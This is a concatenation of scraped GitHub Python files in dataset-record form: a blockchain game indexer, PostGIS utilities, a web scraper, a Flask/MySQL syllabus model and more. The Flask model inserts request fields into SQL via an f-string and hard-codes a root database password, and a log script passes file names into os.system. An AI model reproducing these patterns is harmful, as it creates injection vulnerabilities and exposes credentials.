copied\"}","repo_name":"bradenkh/fastApiProject","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":13585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7856089888","text":"from datetime import datetime\nfrom sqlmodel import Session, or_\nfrom celery import Celery\nfrom models import Logrun,Usefuel, Npcencounter,Car, Logtip, Tip, Template, Asset, Buyfuel\nfrom db import db_session, engine, commit_or_rollback\nimport cachetool,config, os, time, inspect\nfrom utils.nodes import AH, pick_best_waxnode\nfrom disclog import postLog\n\ncelery = Celery(__name__)\ncelery.conf.broker_url = os.environ.get(\"CELERY_BROKER_URL\", \"redis://localhost:6379\")\ncelery.conf.result_backend = os.environ.get(\"CELERY_RESULT_BACKEND\", \"redis://localhost:6379\")\n\nclass SqlAlchemyTask(celery.Task):\n abstract = True\n\n def after_return(self, status, retval, task_id, args, kwargs, einfo):\n db_session.remove()\n\n@celery.on_after_configure.connect\ndef setup_periodic_tasks(sender, **kwargs):\n sender.add_periodic_task(60.0, Atomic.s(), name='routine to keep assets+templates updated')\n\n\n@celery.task(base=SqlAlchemyTask)\ndef Atomic() -> str:\n start=time.perf_counter()\n try:\n scanTemplates()\n except Exception as e:\n postLog(e,\"error\",f\"{inspect.stack()[0][3]}:{inspect.stack()[0][2]}\")\n \n return f\"atomic routine done,took: {(time.perf_counter()-start)} \"\n\ndef fetchRoutine(mode,server):\n \n fetcher = getattr(AH(server=server), mode)\n after = cachetool.get_cache(f\"last_{mode}\")\n page = 1\n out = []\n running = True\n while running:\n try:\n jst = fetcher(page=page,after=after)\n for result in jst[\"data\"]:\n if result[\"schema\"][\"schema_name\"] in config.wanted_templates:\n out.append(result)\n\n if len(jst[\"data\"]) == 0:\n running=False\n else:\n try:\n cachetool.set_cache(f\"last_{mode}\",int(jst[\"data\"][-1][\"minted_at_time\"]))\n except Exception as e:\n cachetool.set_cache(f\"last_{mode}\",int(jst[\"data\"][-1][\"created_at_time\"]))\n\n page += 1\n time.sleep(0.7)\n except Exception as e:\n postLog(e,\"warn\",f\"{inspect.stack()[0][3]}:{inspect.stack()[0][2]}\")\n time.sleep(10)\n return out\n\ndef scanTemplates():\n server= pick_best_waxnode(\"atomic\",6)[0]\n templates = fetchRoutine(\"templates\",server)\n assets = fetchRoutine(\"assets\",server)\n \n writer.delay(templates,\"template\")\n if len(templates) > 100:\n time.sleep(5)\n writer.delay(assets,\"asset\")\n\n \nclass Builder():\n def create_new_action(self,act):\n\n blocktime = datetime.fromisoformat(act[\"block_time\"])\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"logrun\":\n\n with Session(engine) as session:\n full_cars = []\n for index,railcar in enumerate(act[\"action_trace\"][\"act\"][\"data\"][\"loads\"]):\n loads = session.query(Asset).filter(Asset.asset_id.in_(railcar[\"load_ids\"])).all() if railcar[\"load_ids\"] else None\n car = session.query(Asset).filter(Asset.asset_id==railcar[\"railcar_asset_id\"]).first() if railcar[\"railcar_asset_id\"] else None\n if car and loads:\n stm = Car(\n index=index,\n car=[car],\n loads=loads,\n type=loads[0].template.schema_name if loads else \"None\"\n )\n session.add(stm)\n full_cars.append(stm)\n else:\n print(act[\"action_trace\"][\"trx_id\"],railcar)\n \n try:\n session.commit()\n except Exception as e:\n print(e)\n session.rollback()\n\n qry = session.query(Usefuel).filter(Usefuel.trx_id==act[\"action_trace\"][\"act\"][\"data\"][\"last_run_tx\"]).first()\n tips = session.query(Logtip).filter(Logtip.trx_id==act[\"action_trace\"][\"trx_id\"]).all()\n npcs = session.query(Npcencounter).filter(Npcencounter.trx_id==act[\"action_trace\"][\"trx_id\"]).all()\n locos = session.query(Asset).filter(Asset.asset_id.in_(act[\"action_trace\"][\"act\"][\"data\"][\"locomotives\"])).all()\n cons = session.query(Asset).filter(Asset.asset_id.in_(act[\"action_trace\"][\"act\"][\"data\"][\"conductors\"])).all()\n\n\n if qry:\n fuel_type=qry.fuel_type\n quantity=qry.quantity\n else:\n print(f'trx not found: {act[\"action_trace\"][\"act\"][\"data\"][\"last_run_tx\"]}') \n fuel_type=\"COAL\"\n quantity=0\n \n hrhandle = blocktime.strftime(\"20%y-%m-%dT%H:00:00.000\")\n dayhandle = blocktime.strftime(\"20%y-%m-%dT00:00:00.000\")\n\n return Logrun(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n hour_handle = hrhandle,\n hour_handlestamp = int(datetime.fromisoformat(hrhandle).timestamp()),\n day_handle = dayhandle,\n day_handlestamp = int(datetime.fromisoformat(dayhandle).timestamp()),\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n railroader_reward = act[\"action_trace\"][\"act\"][\"data\"][\"railroader_reward\"],\n run_complete = act[\"action_trace\"][\"act\"][\"data\"][\"run_complete\"],\n run_start = act[\"action_trace\"][\"act\"][\"data\"][\"run_start\"],\n locomotives =locos,\n conductors = cons,\n cars=full_cars,\n logtips=tips,\n npcs=npcs,\n station_owner = act[\"action_trace\"][\"act\"][\"data\"][\"station_owner\"],\n station_owner_reward = act[\"action_trace\"][\"act\"][\"data\"][\"station_owner_reward\"],\n train_name = act[\"action_trace\"][\"act\"][\"data\"][\"train_name\"],\n weight = act[\"action_trace\"][\"act\"][\"data\"][\"weight\"],\n arrive_station = act[\"action_trace\"][\"act\"][\"data\"][\"arrive_station\"],\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n depart_station = act[\"action_trace\"][\"act\"][\"data\"][\"depart_station\"],\n distance = act[\"action_trace\"][\"act\"][\"data\"][\"distance\"],\n last_run_time = act[\"action_trace\"][\"act\"][\"data\"][\"last_run_time\"],\n last_run_tx = act[\"action_trace\"][\"act\"][\"data\"][\"last_run_tx\"],\n fuel_type=fuel_type,\n quantity=quantity\n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"usefuel\":\n return Usefuel(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n fuel_type = act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[1],\n quantity = float(act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[0]),\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n \n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"buyfuel\":\n return Buyfuel(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n fuel_type = act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[1],\n quantity = float(act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[0]),\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n tocium_payed = float(act[\"action_trace\"][\"act\"][\"data\"][\"tocium\"].split(\" \")[0]),\n \n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"npcencounter\":\n return Npcencounter(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n npc = act[\"action_trace\"][\"act\"][\"data\"][\"npc\"],\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n reward = int(float(act[\"action_trace\"][\"act\"][\"data\"][\"reward\"].split(\" \")[0])*10000),\n reward_symbol = act[\"action_trace\"][\"act\"][\"data\"][\"reward\"].split(\" \")[1],\n train = act[\"action_trace\"][\"act\"][\"data\"][\"train\"],\n \n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"logtips\":\n return Logtip(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n total_tips = int(act[\"action_trace\"][\"act\"][\"data\"][\"total_tips\"]),\n before_tips = int(act[\"action_trace\"][\"act\"][\"data\"][\"before_tips\"]),\n train = act[\"action_trace\"][\"act\"][\"data\"][\"train\"],\n tips= [ Tip(template_id = int(tipu[\"template_id\"]), criterion = tipu[\"criterion\"], amount = int(tipu[\"tip\"])) for tipu in act[\"action_trace\"][\"act\"][\"data\"][\"tips\"]],\n )\n\n def create_new_template(self,template):\n template_skeleton = Template(\n template_id=int(template[\"template_id\"]),\n schema_name = template[\"schema\"][\"schema_name\"],\n name=template[\"immutable_data\"][\"name\"],\n cardid=template[\"immutable_data\"][\"cardid\"],\n rarity=template[\"immutable_data\"][\"rarity\"],\n img=template[\"immutable_data\"][\"img\"] if (\"img\" in template[\"immutable_data\"].keys()) else \"\"\n )\n\n if template[\"schema\"][\"schema_name\"] == \"passengercar\":\n template_skeleton.weight = template[\"immutable_data\"][\"weight\"]\n template_skeleton.seats = template[\"immutable_data\"][\"seats\"]\n\n if template[\"schema\"][\"schema_name\"] == \"passenger\":\n template_skeleton.tip = template[\"immutable_data\"][\"tip\"]\n template_skeleton.desc = template[\"immutable_data\"][\"desc\"]\n template_skeleton.criterion = template[\"immutable_data\"][\"criterion\"]\n template_skeleton.threshold = template[\"immutable_data\"][\"threshold\"]\n template_skeleton.home_region = template[\"immutable_data\"][\"home_region\"]\n template_skeleton.home_regionid = template[\"immutable_data\"][\"home_regionid\"]\n \n if template[\"schema\"][\"schema_name\"] == \"locomotive\":\n template_skeleton.fuel = template[\"immutable_data\"][\"fuel\"]\n template_skeleton.speed = template[\"immutable_data\"][\"speed\"]\n template_skeleton.distance = template[\"immutable_data\"][\"distance\"]\n template_skeleton.composition = template[\"immutable_data\"][\"composition\"]\n template_skeleton.hauling_power = template[\"immutable_data\"][\"hauling_power\"] if (\"hauling_power\" in template[\"immutable_data\"].keys()) else None\n template_skeleton.conductor_threshold = template[\"immutable_data\"][\"conductor_threshold\"] \n\n if template[\"schema\"][\"schema_name\"] == \"conductor\":\n template_skeleton.perk = template[\"immutable_data\"][\"perk\"]\n template_skeleton.perk_boost = template[\"immutable_data\"][\"perk_boost\"]\n template_skeleton.perk2 = template[\"immutable_data\"][\"perk2\"] if (\"perk2\" in template[\"immutable_data\"].keys()) else None\n template_skeleton.perk_boost2 = template[\"immutable_data\"][\"perk_boost2\"] if (\"perk_boost2\" in template[\"immutable_data\"].keys()) else None\n template_skeleton.conductor_level = template[\"immutable_data\"][\"conductor_level\"]\n\n if template[\"schema\"][\"schema_name\"] == \"railcar\":\n template_skeleton.size = template[\"immutable_data\"][\"size\"]\n template_skeleton.type = template[\"immutable_data\"][\"type\"]\n template_skeleton.capacity = template[\"immutable_data\"][\"capacity\"]\n template_skeleton.commodity_type = template[\"immutable_data\"][\"commodity_type\"]\n template_skeleton.commodity_type2 = template[\"immutable_data\"][\"commodity_type2\"] if (\"commodity_type2\" in template[\"immutable_data\"].keys()) else None\n\n if template[\"schema\"][\"schema_name\"] == \"commodity\":\n template_skeleton.volume = template[\"immutable_data\"][\"volume\"]\n template_skeleton.weight = template[\"immutable_data\"][\"weight\"]\n template_skeleton.type = template[\"immutable_data\"][\"type\"]\n \n if template[\"schema\"][\"schema_name\"] == \"station\":\n template_skeleton.desc = template[\"immutable_data\"][\"desc\"]\n\n return template_skeleton\n\n def create_new_asset(self,asset):\n \n asset_skeleton = Asset(\n asset_id=str(asset[\"asset_id\"]),\n template_id = int(asset[\"template\"][\"template_id\"]),\n )\n if asset[\"schema\"][\"schema_name\"] == \"station\":\n asset_skeleton.img = asset[\"immutable_data\"][\"img\"]\n asset_skeleton.region = asset[\"immutable_data\"][\"region\"]\n asset_skeleton.region_id = asset[\"immutable_data\"][\"region_id\"]\n\n return asset_skeleton\n \n\n@celery.task(base=SqlAlchemyTask)\ndef writer(to_write,mode) -> str:\n start=time.perf_counter()\n method = getattr(Builder(), f\"create_new_{mode}\")\n for item in to_write:\n new_item = method(item)\n if new_item:\n commit_or_rollback(new_item)\n \n return f\"{(time.perf_counter()-start)} for {len(to_write)} items. mode: {mode}\"\n ","repo_name":"automaqqt/toc-history-api","sub_path":"project/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":14235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36492810285","text":"import sqlalchemy as sqla\nimport pandas as pd\nimport geopandas as gpd\nimport os\n\ndef table_to_gdf(conn, schema, layer):\n \"\"\"_summary_\n\n Parameters\n ----------\n conn : _type_\n _description_\n schema : _type_\n _description_\n layer : _type_\n _description_\n \"\"\"\n gdf = gpd.GeoDataFrame.from_postgis(\"SELECT * FROM {0}.{1};\".format(\n schema, layer), conn, geom_col='geom', index_col='ogc_fid',\n coerce_float=True)\n return(gdf)\n\ndef md_dict(conn, schema, layer):\n \"\"\"_summary_\n\n Parameters\n ----------\n conn : _type_\n _description_\n schema : _type_\n _description_\n layer : _type_\n _description_\n \"\"\"\n md = pd.read_sql(\"SELECT * FROM public.qgis_layer_metadata WHERE \\\n f_table_name = '{0}' AND f_table_schema = '{1}';\".format(layer, schema),\n conn)\n return(md.to_dict('records')[0])\n\ndef table_to_geojson(conn, schema, layer, outdir='tmp'):\n \"\"\"Read a table layer and write out to a geojson file.\n\n Parameters\n ----------\n conn : _type_\n _description_\n schema : _type_\n _description_\n layer : _type_\n _description_\n outdir : str, optional\n _description_, by default 'tmp'\n \"\"\"\n gdf = table_to_gdf(conn, schema, layer)\n fname = os.path.join(outdir, layer + '.geojson')\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n gdf.to_file(fname, driver='GeoJSON')\n return(fname)\n\n\ndef upsert_df_to_table(df, key, engine, tmp_table, dest_table,\n schema='public'):\n \"\"\"Update/insert ('upsert) a pandas dataframe into a PostgreSQL table\n\n Since the pandas `to_sql` method has no method to update/insert, this\n essentially creates a temporary table to hold the updated dataframe rows,\n deletes the matching rows (by key) in the destination table, and then\n appends the new/updated rows.\n \"\"\"\n # Make sure the updated dataframe has the 'key' column as index\n df = df.set_index(key)\n\n # Put the updated dataframe into a temporary PG table\n df.to_sql(tmp_table, engine, if_exists='replace', index=True, schema=schema)\n\n # Get the connection/transaction objects\n conn = engine.connect()\n trans = conn.begin()\n\n try:\n # Delete the rows in the destination table that we are going to \"upsert\"\n conn.execute(sqla.text(\"DELETE FROM {0}.{1} WHERE {2} IN (SELECT {2} FROM {0}.{3})\".format(\n schema, dest_table, key, tmp_table)))\n trans.commit()\n\n # Insert the changed rows\n df.to_sql(dest_table, engine, if_exists='append', index=True)\n except:\n trans.rollback()\n raise","repo_name":"jornada-im/jgeo-utils","sub_path":"jgeo_py/pgio.py","file_name":"pgio.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10762083257","text":"#!/usr/bin/env python\n\nimport sys, os, argparse\nfrom datetime import datetime\nfrom tqdm import tqdm\n\ndef info(*values):\n print(*values, file=sys.stderr)\n\ndef tail(name):\n with open(name, 'r') as f:\n lines = f.read().splitlines()\n last_line = lines[-1]\n return last_line\n\ndef has_train_finished(log_name):\n if not os.path.exists(log_name):\n # assume ckpt is copied from somewhere else\n return True\n else:\n last_line = tail(log_name)\n return last_line.startswith('Training finished on')\n\ndef main(args):\n for log_name in tqdm([l.strip() for l in args.logs]):\n if not has_train_finished(log_name):\n mtime = datetime.fromtimestamp(os.path.getmtime(log_name))\n print('==> {} (Last Updated: {})'.format(log_name, mtime))\n os.system('tail -n5 {}'.format(log_name))\n print()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-l', '--logs', default=sys.stdin)\n\n args = parser.parse_args()\n info(args)\n\n main(args)","repo_name":"toshohirasawa/mmt-with-monolingual-data","sub_path":"scripts/ls-train-stat.py","file_name":"ls-train-stat.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2402924493","text":"import sqlite3\nimport time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom pyquery import PyQuery as pq\nfrom config import *\n\nfrom urllib.parse import quote\n\n#采用Chrome headless 须安装Chrome浏览器和与之匹配的Chromedriver.exe,并设置环境变量\nfrom selenium.webdriver.chrome.options import Options\nglobal browser\n\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--disable-gpu')\nbrowser = webdriver.Chrome(chrome_options=chrome_options)\n\"\"\"\n#采用PhantomJS,但已慢慢开始被放弃\nSERVICE_ARGS = ['--load-images=false', '--disk-cache=true']\nbrowser = webdriver.PhantomJS(service_args=SERVICE_ARGS)\n\"\"\"\nwait = WebDriverWait(browser, 10)\nconn = sqlite3.connect('test.db')#用sqlite3 如果文件不存在,会自动在当前目录创建:\ncursor = conn.cursor()# 创建一个Cursor:\n\nbrowser.get('http://www.cdggzy.com')\ntime.sleep(1)\nxmlxnamelist = ['JSGC','ZFCG','LandTrade','AssetResource']\nxmlxurllist = []\nfor link in browser.find_elements_by_xpath(\"//*[@href]\"):\n for xmlx in xmlxnamelist:\n if (link.get_attribute('href')).find(xmlx)>0 and xmlxurllist.count(link.get_attribute('href'))==0:\n xmlxurllist.append(link.get_attribute('href'))\n else:\n pass\n#print(xmlxurllist)\n\"\"\"\n#获取项目类型的链接 方法一\nurlJSGC = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[1]/a\").get_attribute('href')\nurlLand = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[2]/a\").get_attribute('href')\nurlReso = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[3]/a\").get_attribute('href')\nurlZFCG = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[4]/a\").get_attribute('href')\n#赋予项目类型的链接\nurl = ['http://www.cdggzy.com/site/JSGC/List.aspx',\n 'http://www.cdggzy.com/site/Notice/ZFCG/NoticeList.aspx',\n 'http://www.cdggzy.com/site/LandTrade/LandList.aspx',\n 'http://www.cdggzy.com/site/AssetResource/DealNoticeList.aspx']\n\"\"\"\nurl = xmlxurllist #[urlJSGC,urlZFCG,urlLand,urlReso]\nxmlxlist = ['建','采','土','资']\nurltext = url[0]\nxmlx = xmlxlist[0]\nurl_database_text ='create table IF NOT EXISTS gonggaob (item varchar(20) ,quxian varchar(6),infotitle varchar(50),baoming varchar(10), publishtime varchar(20))'\n\n\"\"\" #读取表名\ncursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\") \ntablenames = (cursor.fetchall())\nprint(tablenames)\n\"\"\"\ntry:\n cursor.execute(url_database_text) # 执行一条SQL语句,创建user表:\n cursor.execute('delete from gonggaob where 1=1') # 清空表格\nexcept:\n\n print('Create table failed')\n pass\ndef index_page(page):\n\n try:\n for i in range(len(xmlxurllist)):#爬取项目类型range(2):\n urltext=url[i]\n #xmlx=xmlxlist[i]\n #print(xmlxlist[i])\n browser.get(urltext)\n browser.find_element_by_xpath(\"//div[@data-value='0']\").click() # 点击公告类型:全部公告\n browser.find_element_by_xpath(\"//div[@data-value='510112']\").click() # 点击交易地点:龙泉驿区\n time.sleep(5)\n\n pagestext = str(browser.find_element_by_xpath(\"//*[@id='LabelPage']\").text)\n #pagestext = doc.find('#LabelPage').text()\n pageslist = pagestext.split('/')[:]\n #currentpage = int(pageslist[0])\n totalpages = int(pageslist[1])\n #print(pageslist)\n if page == 1:\n get_products(page, i)\n elif page <= totalpages:\n browser.find_element_by_xpath(\"//*[@id='Pager']/a[\" + str(page + 1) + \"]\").click()\n time.sleep(5)\n #html = browser.page_source\n #doc = pq(html)\n #pagestext2 = str(browser.find_element_by_xpath(\"//*[@id='LabelPage']\").text)\n #pagestext2 = doc.find('#LabelPage').text()\n #pageslist2 = pagestext2.split('/')[:]\n #print(pageslist2)\n \"\"\"\n browser.find_element_by_xpath(\"//button[@id='preview']\").click() # 点击 上一页 \n browser.find_element_by_xpath(\"//button[@id='nextview']\").click() # 点击 下一页\n \"\"\"\n get_products(page, i)\n else:\n pass\n time.sleep(1)\n except TimeoutException:\n #index_page(page)\n pass\ndef get_products(page,i):\n time.sleep(1) # 必须缓冲一下才行\n html = browser.page_source\n doc = pq(html)\n print(xmlxlist[i]+':爬取第', page, '页 当前页:' + doc.find('#LabelPage').text())\n contentlist = doc('#contentlist .contentitem').items()\n content = doc('#contentlist').text()\n print(content)\n ins = \"insert into gonggaob values(?,?,?,?,?);\"\n rownum = 0\n for contentitem in contentlist:\n bm = contentitem.find('.item-right')\n bmtext = bm.text()\n if len(bmtext) == 10:\n bmtext = ''\n else:\n bmtext = bm.text()[-4:] # 截取倒数第四个字符到结尾\n product = {\n 'quxian': contentitem.find('.col-xs-1').text(),\n 'infotitle': contentitem.find('.infotitle').text(),\n 'baoming': bmtext,\n 'publishtime': contentitem.find('.publishtime').text()\n }\n # print(product)\n cursor.execute(ins, (\n xmlxlist[i], product['quxian'], product['infotitle'], product['baoming'], product['publishtime']))\n rownum = rownum + 1\n conn.commit()\n\n #except:\n # pass\ndef main():\n for i in range(3): #爬取页数1-3页\n index_page(i+1)\n cursor.close()\n\n conn.close() # 关闭Connection:\n browser.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"morewit/morewit","sub_path":"TaobaoProduct-master/spider_lqggzy.py","file_name":"spider_lqggzy.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25817711979","text":"#from app import app\n#from app.controladores.controlador import tasks\nfrom flask import jsonify, request\nfrom flaskext.mysql import MySQL\n\nclass Model:\n\n def __init__(self,app):\n self.mysql=MySQL()\n app.config['MYSQL_DATABASE_USER']='root'\n app.config['MYSQL_DATABASE_PASSWORD']='unsa12345'\n app.config['MYSQL_DATABASE_DB']='Silabos'\n app.config['MYSQL_DATABASE_HOST']='127.0.0.1'\n self.mysql.init_app(app)\n\n self.con=self.mysql.connect()\n self.cursor=self.con.cursor()\n\n def getSilabos(self):\n silabos = []\n self.cursor.execute(\"SELECT * from Silabo\")\n tmp = self.cursor.fetchall()\n for silabo in tmp:\n s = {}\n s[\"id\"] = silabo[0]\n s[\"sem\"] = silabo[1]\n silabos.append(s)\n\n return jsonify(silabos)\n \n \n def addDocente(self):\n print(request.json)\n query = f'INSERT INTO Docente (doc_dni , doc_nom , doc_ape_pat , doc_ape_mat , doc_grad_aca , dep_aca_ide ) VALUES ({request.json[\"dni\"]},\"{request.json[\"name\"]}\",\"{request.json[\"lastname1\"]}\",\"{request.json[\"lastname2\"]}\",\"{request.json[\"gradoacademico\"]}\",{request.json[\"depAcademico\"]})'\n print (query)\n self.cursor.execute(query)\n self.con.commit()\n return \"Insert Succesful\"\n\n def searchDocente(self, dni):\n Docentes = []\n query = \"SELECT doc_ide ,doc_dni , doc_nom , doc_ape_pat , doc_ape_mat , doc_grad_aca , dep_aca_ide FROM Docente WHERE doc_dni = %s AND doc_del_date is null \"\n self.cursor.execute(query, (dni,))\n data = self.cursor.fetchall()\n \n for dnis in data:\n s = {}\n s[\"doc_ide\"] = dnis[0]\n s[\"doc_dni\"] = dnis[1]\n s[\"doc_nom\"] = dnis[2]\n s[\"doc_ape_mat\"] = dnis[3]\n s[\"doc_ape_pat\"] = dnis[4]\n s[\"doc_grad_aca\"] = dnis[5]\n s[\"dep_aca_ide\"] = dnis[6]\n \n Docentes.append(s)\n \n return jsonify(Docentes[0])\n\n\n def deleteDocente(self,dni):\n query = \"UPDATE Docente SET doc_del_date=now() WHERE doc_dni= %s\"\n self.cursor.execute(query, (dni,))\n self.con.commit()\n return \"Docente Eliminado\"\n\n def updateDocente(self ):\n newdata = request.json\n print (\"BODY JSON: \",newdata)\n t = newdata[\"doc_ide\"]\n #query = \"UPDATE Docente SET doc_dni = %s , doc_nom = %s, doc_ape_pat = %s, doc_ape_mat = %s, doc_grad_aca = %s, dep_aca_ide = %s WHERE doc_ide = %s \" , ( newdata[\"doc_dni\"],newdata[\"doc_nom\"] ,newdata[\"doc_ape_pat\"],newdata[\"doc_ape_mat\"],newdata[\"doc_grad_aca\"],newdata[\"dep_aca_ide\"],newdata[\"doc_ide\"] )\n query = \"UPDATE Docente SET doc_dni = %s , doc_nom = %s, doc_ape_pat = %s, doc_ape_mat = %s, doc_grad_aca = %s, dep_aca_ide = %s WHERE doc_ide = %s\" \n \n #print (query)\n\n self.cursor.execute(query,( newdata[\"doc_dni\"],newdata[\"doc_nom\"] ,newdata[\"doc_ape_pat\"],newdata[\"doc_ape_mat\"],newdata[\"doc_grad_aca\"],newdata[\"dep_aca_ide\"],newdata[\"doc_ide\"]))\n self.con.commit()\n return \"Docente Actualizado\"\n \n \n\n def searchCurs(self, cod):\n Cursos = []\n query = \"SELECT cur_cod , cur_nom , cur_sem , cur_dur , cur_hor_teo , cur_hor_prac , cur_hor_lab , cur_credi , cur_fund FROM Curso WHERE cur_cod = %s \"\n \n self.cursor.execute(query, (cod,))\n data = self.cursor.fetchall()\n\n for codi in data:\n s = {}\n s[\"cur_cod\"] = codi[0]\n s[\"cur_nom\"] = codi[1]\n s[\"cur_sem\"] = codi[2]\n s[\"cur_dur\"] = codi[3]\n s[\"cur_hor_teo\"] = codi[4]\n s[\"cur_hor_prac\"] = codi[5]\n s[\"cur_hor_lab\"] = codi[6]\n s[\"cur_credi\"] = codi[7]\n s[\"cur_fund\"] = codi[8]\n \n Cursos.append(s)\n\n return jsonify(Cursos[0])\n ","repo_name":"JoseCcari/TI2-Silabo","sub_path":"TI2-Silabo/app/modelos/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18538547945","text":"# 이진 검색 트리 G5\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\narr = []\n# 입력이 없을때까지 반복하여 입력을 리스트에 추가한다.\nwhile True:\n try:\n arr.append(int(input()))\n except:\n break\n\n\ndef postorder(first, end):\n if first > end:\n return\n mid = end + 1 # 오른쪽 노드가 없을 경우(루트보다 큰 값이 없을 때)\n\n # 서브트리 탐색\n for i in range(first + 1, end + 1):\n if arr[first] < arr[i]: # 루트보다 큰 값이면 오른쪽 서브트리로\n mid = i # 왼쪽 서브트리, 오른쪽 서브트리로 나뉘는 부분을 mid로 설정\n break\n\n postorder(first + 1, mid - 1) # 왼쪽 서브트리를 재귀적으로 탐색\n postorder(mid, end) # 오른쪽 서브트리를 재귀적으로 탐색\n print(arr[first])\n\n\npostorder(0, len(arr) - 1)\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"트리/5639.py","file_name":"5639.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15880948909","text":"import gtk\nimport urllib\nimport webkit\nimport string\n\nfrom gtk import Builder\nimport gwibber.microblog\nfrom gwibber.microblog import facebook\nfrom gwibber.microblog.util import facelib\nfrom gwibber.microblog.util.const import *\n# Try to import * from custom, install custom.py to include packaging \n# customizations like distro API keys, etc\ntry:\n from gwibber.microblog.util.custom import *\nexcept:\n pass\n\nimport json, urlparse, gnomekeyring, uuid\nimport gettext\nfrom gettext import gettext as _\nif hasattr(gettext, 'bind_textdomain_codeset'):\n gettext.bind_textdomain_codeset('gwibber','UTF-8')\ngettext.textdomain('gwibber')\n\n\"\"\"\ngtk.gdk.threads_init()\n\nAPP_KEY = \"71b85c6d8cb5bbb9f1a3f8bbdcdd4b05\"\n\"\"\"\n\nclass AccountWidget(gtk.VBox):\n \"\"\"AccountWidget: A widget that provides a user interface for configuring facebook accounts in Gwibber\n \"\"\"\n \n def __init__(self, account=None, dialog=None):\n \"\"\"Creates the account pane for configuring facebook accounts\"\"\"\n gtk.VBox.__init__( self, False, 20 )\n self.ui = gtk.Builder()\n self.ui.set_translation_domain (\"gwibber\")\n self.ui.add_from_file (gwibber.resources.get_ui_asset(\"gwibber-accounts-facebook.ui\"))\n self.ui.connect_signals(self)\n self.vbox_settings = self.ui.get_object(\"vbox_settings\")\n self.pack_start(self.vbox_settings, False, False)\n self.show_all()\n if account:\n self.account = account\n else:\n self.account = {}\n self.dialog = dialog\n has_secret_key = True\n if self.account.has_key(\"id\"):\n try:\n value = gnomekeyring.find_items_sync(gnomekeyring.ITEM_GENERIC_SECRET, {\"id\": str(\"%s/%s\" % (self.account[\"id\"], \"secret_key\"))})[0].secret\n except gnomekeyring.NoMatchError:\n has_secret_key = False\n try:\n if self.account[\"session_key\"] and self.account[\"secret_key\"] and self.account[\"username\"] and has_secret_key:\n self.ui.get_object(\"hbox_facebook_auth\").hide()\n self.ui.get_object(\"fb_auth_done_label\").set_label(_(\"%s has been authorized by Facebook\") % str(self.account[\"username\"]))\n self.ui.get_object(\"hbox_facebook_auth_done\").show()\n else:\n self.ui.get_object(\"hbox_facebook_auth_done\").hide()\n self.ui.get_object(\"facebook_auth_button\").modify_bg(gtk.STATE_NORMAL, 